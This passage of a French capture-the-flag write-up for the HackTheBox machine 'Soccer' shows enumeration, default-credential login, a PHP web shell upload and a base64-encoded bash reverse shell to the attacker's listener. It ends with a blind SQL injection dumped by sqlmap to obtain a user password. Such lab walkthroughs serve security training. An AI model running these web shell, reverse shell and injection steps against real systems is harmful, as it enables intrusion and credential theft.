class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/ </span></span><span class="line"><span class="cl">80/tcp open http syn-ack nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://soccer.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">9091/tcp open xmltec-xmlmail? syn-ack </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">400</span> Bad Request </span></span><span class="line"><span class="cl"><span class="p">|</span> Connection: close </span></span><span class="line"><span class="cl"><span class="p">|</span> GetRequest: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">404</span> Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Security-Policy: default-src <span class="s1">&#39;none&#39;</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> X-Content-Type-Options: nosniff </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Length: <span class="m">139</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Mon, <span class="m">10</span> Mar <span class="m">2025</span> 22:22:14 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span> Connection: close </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;!DOCTYPE html&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;html <span class="nv">lang</span><span class="o">=</span><span class="s2">&#34;en&#34;</span>&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;head&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;meta <span class="nv">charset</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;title&gt;Error&lt;/title&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/head&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;body&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;pre&gt;Cannot GET /&lt;/pre&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/body&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/html&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTPOptions, RTSPRequest: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">404</span> Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Security-Policy: default-src <span class="s1">&#39;none&#39;</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> X-Content-Type-Options: nosniff </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Length: <span class="m">143</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Mon, <span class="m">10</span> Mar <span class="m">2025</span> 22:22:14 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span> Connection: close </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;!DOCTYPE html&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;html <span class="nv">lang</span><span class="o">=</span><span class="s2">&#34;en&#34;</span>&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;head&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;meta <span class="nv">charset</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;title&gt;Error&lt;/title&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/head&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;body&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;pre&gt;Cannot OPTIONS /&lt;/pre&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/body&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span>_ &lt;/html&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="gobuster---tiny-file-manager">gobuster - tiny file manager </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ gobuster dir --url http://soccer.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://soccer.htb/ </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/tiny <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 178<span class="o">]</span> <span class="o">[</span>--&gt; http://soccer.htb/tiny/<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>On arrive ensuite sur une page de connexion &ldquo;Tiny File Manager&rdquo;. Après quelques recherches, on essaye les mots de passes par défaut et on trouve :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">admin : admin@123 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="tiny-file-manager-rce--searchsploit">Tiny file manager RCE : searchsploit </h3><p>Avec searchsploit on trouve un RCE authentifié.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Soccer<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ searchsploit tiny file manager </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Manx 1.0.1 - <span class="s1">&#39;/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php&#39;</span> Multiple Cross-Site Scripting Vulnerabilities <span class="p">|</span> php/webapps/36364.txt </span></span><span class="line"><span class="cl">Manx 1.0.1 - <span class="s1">&#39;/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php&#39;</span> Multiple Cross-Site Scripting Vulnerabilities <span class="p">|</span> php/webapps/36365.txt </span></span><span class="line"><span class="cl">MCFileManager Plugin <span class="k">for</span> TinyMCE 3.2.2.3 - Arbitrary File Upload <span class="p">|</span> php/webapps/15768.txt </span></span><span class="line"><span class="cl">Tiny File Manager 2.4.6 - Remote Code Execution <span class="o">(</span>RCE<span class="o">)</span> <span class="p">|</span> php/webapps/50828.sh </span></span><span class="line"><span class="cl">TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload <span class="p">|</span> php/webapps/15194.txt </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span></code></pre></td></tr></table> </div> </div><h3 id="rce-exploit">RCE exploit </h3><p>On se connecte les creds par défaut :</p> <ul> <li>admin : admin@123 On peut uploader facilement un fichier php dans le dossier tiny/uploads sur l&rsquo;interface d&rsquo;aministration:</li> </ul> <blockquote> <?php system($_GET['cmd']) ?> </blockquote> <p>Ensuite, on execute un reverse shell. On a mis la commande en base64 pour eviter les bugs avec les caractères spéciaux :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ http://soccer.htb/tiny/uploads/a.php?cmd<span class="o">=</span>echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvOTAwMSAwPiYx+<span class="p">|</span>+base64+-d+<span class="p">|</span>+bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Soccer<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">9001</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.10<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.194<span class="o">]</span> <span class="m">34268</span> </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#34;import pty;pty.spawn(&#39;</span>/bin/bash<span class="err">&#39;</span><span class="o">)</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@soccer:~/html/tiny/uploads</span>$<span class="s2"> export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@soccer:~/html/tiny/uploads</span>$<span class="s2"> ^Z </span></span></span><span class="line"><span class="cl"><span class="s2">zsh: suspended nc -lnvp 9001 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">┌──(kali㉿kali)-[~/htb/Soccer] </span></span></span><span class="line"><span class="cl"><span class="s2">└─</span>$<span class="s2"> stty raw -echo; fg </span></span></span><span class="line"><span class="cl"><span class="s2">[1] + continued nc -lnvp 9001 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@soccer:~/html/tiny/uploads</span>$<span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@soccer:~/html/tiny/uploads</span>$<span class="s2"> whoami </span></span></span><span class="line"><span class="cl"><span class="s2">www-data </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@soccer:~/html/tiny/uploads</span>$<span class="s2"> cat /home/player/user.txt </span></span></span><span class="line"><span class="cl"><span class="s2">cat: /home/player/user.txt: Permission denied </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="soc-playersoccerhtb">soc-player.soccer.htb </h3><p>A l&rsquo;aide de linpeas, on trouve un autre nom de domaine qui nous donne accès à une nouvelle page.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@soccer:/tmp$ cat linpeas.out <span class="p">|</span> grep soccer.htb </span></span><span class="line"><span class="cl">127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb </span></span><span class="line"><span class="cl"> server_name soc-player.soccer.htb<span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="m">301</span> http://soccer.htb<span class="nv">$request_uri</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> server_name soccer.htb<span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="searching-for-football-tickets">Searching for football tickets </h3><p>On arrive sur une page web où l&rsquo;ont peut créer un compte puis se connecter. On a alors accès à une page avec un Ticket id. On peut rechercher si un ticket existe ou non en ecrivant un &lsquo;id&rsquo; de ticket, un nombre entier. Si le site web repond &ldquo;Ticket exists&rdquo;, alors le ticket existe. Sinon, si on a &ldquo;Ticket doesn&rsquo;t exist&rdquo;, c&rsquo;est qu&rsquo;il n&rsquo;existe pas. On essaye de tester une injection SQL :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="m">1</span> or <span class="nv">1</span><span class="o">=</span>1<span class="p">;</span> -- </span></span></code></pre></td></tr></table> </div> </div><p>ça fonctionne! Il nous dit que le ticket est valide ! Alors qu&rsquo;il est bien invalide normalement. On a donc ce qu&rsquo;on appelle une Boolean (Blind ?) SQL Injection. C&rsquo;est à dire qu&rsquo;il faut faire des requetes à l&rsquo;aveugle, et selon la réponse, Vrai ou faux, on déduit le nom des tables, colonnes etc.</p> <h3 id="boolean-blind--sql-injection">Boolean (Blind ?) SQL Injection </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Soccer<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sqlmap -u <span class="s2">&#34;ws://soc-player.soccer.htb:9091&#34;</span> --threads <span class="m">10</span> --data <span class="s1">&#39;{&#34;id&#34;:&#34;1&#34;}&#39;</span> --batch -D soccer_db -T accounts --dump </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span>,<span class="o">]</span>_____ ___ ___ <span class="o">{</span>1.8.11#stable<span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ -<span class="p">|</span> . <span class="o">[)]</span> <span class="p">|</span> .<span class="s1">&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s1">|___|_ [,]_|_|_|__,| _| </span></span></span><span class="line"><span class="cl"><span class="s1"> |_|V... |_| https://sqlmap.org </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;</span>s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible <span class="k">for</span> any misuse or damage caused by this program </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> starting @ 09:14:53 /2025-03-12/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">JSON data found in POST body. Do you want to process it? <span class="o">[</span>Y/n/q<span class="o">]</span> Y </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resuming back-end DBMS <span class="s1">&#39;mysql&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:53<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> testing connection to the target URL </span></span><span class="line"><span class="cl">sqlmap resumed the following injection point<span class="o">(</span>s<span class="o">)</span> from stored session: </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl">Parameter: JSON id <span class="o">((</span>custom<span class="o">)</span> POST<span class="o">)</span> </span></span><span class="line"><span class="cl"> Type: time-based blind </span></span><span class="line"><span class="cl"> Title: MySQL &gt;<span class="o">=</span> 5.0.12 AND time-based blind <span class="o">(</span>query SLEEP<span class="o">)</span> </span></span><span class="line"><span class="cl"> Payload: <span class="o">{</span><span class="s2">&#34;id&#34;</span>:<span class="s2">&#34;1 AND (SELECT 3147 FROM (SELECT(SLEEP(5)))ioMT)&#34;</span><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Type: boolean-based blind </span></span><span class="line"><span class="cl"> Title: OR boolean-based blind - WHERE or HAVING clause </span></span><span class="line"><span class="cl"> Payload: <span class="o">{</span><span class="s2">&#34;id&#34;</span>:<span class="s2">&#34;-3742 OR 8591=8591&#34;</span><span class="o">}</span> </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> the back-end DBMS is MySQL </span></span><span class="line"><span class="cl">back-end DBMS: MySQL &gt;<span class="o">=</span> 5.0.12 </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetching columns <span class="k">for</span> table <span class="s1">&#39;accounts&#39;</span> in database <span class="s1">&#39;soccer_db&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: <span class="m">4</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: <span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: email </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: id </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: <span class="m">8</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: password </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: <span class="m">8</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resumed: username </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetching entries <span class="k">for</span> table <span class="s1">&#39;accounts&#39;</span> in database <span class="s1">&#39;soccer_db&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetching number of entries <span class="k">for</span> table <span class="s1">&#39;accounts&#39;</span> in database <span class="s1">&#39;soccer_db&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:56<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:57<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:57<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">17</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:59<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: player@player.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:59<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:14:59<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">4</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">1324</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">20</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:02<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: PlayerOftheMatch2022 </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:02<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:02<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">6</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:03<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: player </span></span><span class="line"><span class="cl">Database: soccer_db </span></span><span class="line"><span class="cl">Table: accounts </span></span><span class="line"><span class="cl"><span class="o">[</span><span class="m">1</span> entry<span class="o">]</span> </span></span><span class="line"><span class="cl">+------+-------------------+----------------------+----------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> email <span class="p">|</span> password <span class="p">|</span> username <span class="p">|</span> </span></span><span class="line"><span class="cl">+------+-------------------+----------------------+----------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1324</span> <span class="p">|</span> player@player.htb <span class="p">|</span> PlayerOftheMatch2022 <span class="p">|</span> player <span class="p">|</span> </span></span><span class="line"><span class="cl">+------+-------------------+----------------------+----------+ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:03<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> table <span class="s1">&#39;soccer_db.accounts&#39;</span> dumped to CSV file <span class="s1">&#39;/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb/dump/soccer_db/accounts.csv&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>09:15:03<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetched data logged to text files under <span class="s1">&#39;/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ending @ 09:15:03 /2025-03-12/ </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-connection-to-player">SSH connection to &ldquo;player&rdquo; </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span 